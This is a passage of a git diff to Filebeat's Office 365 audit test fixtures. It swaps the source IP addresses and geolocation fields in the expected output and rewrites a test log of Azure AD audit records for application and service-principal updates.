 "o365.audit.CreationTime": "2021-02-04T16:32:42",
 "o365.audit.ExtendedProperties.additionalDetails": "{\"UserType\":\"Member\",\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}",
 "o365.audit.ExtendedProperties.extendedAuditEventCategory": "User",
@@ -861,23 +857,19 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "52.109.68.40",
+ "related.ip": "67.43.156.15",
 "related.user": [
 "newuser",
 "root"
 ],
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Paris",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "FR",
- "source.geo.country_name": "France",
- "source.geo.location.lat": 48.8607,
- "source.geo.location.lon": 2.3281,
- "source.geo.region_iso_code": "FR-75",
- "source.geo.region_name": "Paris",
- "source.ip": "52.109.68.40",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.15",
 "tags": [
 "forwarded"
 ],
@@ -892,8 +884,8 @@
 },
 {
 "@timestamp": "2021-02-04T16:32:42.000Z",
- "client.address": "52.109.68.40",
- "client.ip": "52.109.68.40",
+ "client.address": "67.43.156.15",
+ "client.ip": "67.43.156.15",
 "event.action": "Update StsRefreshTokenValidFrom Timestamp.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -908,7 +900,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 38085,
+ "log.offset": 38073,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -941,9 +933,9 @@
 }
 ],
 "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "o365.audit.ActorIpAddress": "52.109.68.40",
+ "o365.audit.ActorIpAddress": "67.43.156.15",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "52.109.68.40",
+ "o365.audit.ClientIP": "67.43.156.15",
 "o365.audit.CreationTime": "2021-02-04T16:32:42",
 "o365.audit.ExtendedProperties.additionalDetails": "{\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}",
 "o365.audit.ExtendedProperties.extendedAuditEventCategory": "User",
@@ -991,20 +983,16 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "52.109.68.40",
+ "related.ip": "67.43.156.15",
 "related.user": "root",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Paris",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "FR",
- "source.geo.country_name": "France",
- "source.geo.location.lat": 48.8607,
- "source.geo.location.lon": 2.3281,
- "source.geo.region_iso_code": "FR-75",
- "source.geo.region_name": "Paris",
- "source.ip": "52.109.68.40",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.15",
 "tags": [
 "forwarded"
 ],
@@ -1032,7 +1020,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 42153,
+ "log.offset": 42141,
 "o365.audit.Actor": [
 {
 "ID": "21119711-1517-43d4-8138-b537dafad016",
@@ -1133,7 +1121,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 43608,
+ "log.offset": 43596,
 "o365.audit.Actor": [
 {
 "ID": "21119711-1517-43d4-8138-b537dafad016",
diff --git a/x-pack/filebeat/module/o365/audit/test/08-azuread.log b/x-pack/filebeat/module/o365/audit/test/08-azuread.log
index 7f53e3e5cf9e..eebef64a07f0 100644
--- a/x-pack/filebeat/module/o365/audit/test/08-azuread.log
+++ b/x-pack/filebeat/module/o365/audit/test/08-azuread.log
@@ -1,100 +1,100 @@ -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n 
\"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": 
"auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": 
"83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 
20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": 
"env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n 
\"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "Name": "RequiredResourceAccess"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"} -{"OrganizationId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1638042Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438642"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "b2cc2456-5ac5-4399-b960-82a40036476f"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": 
"2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": 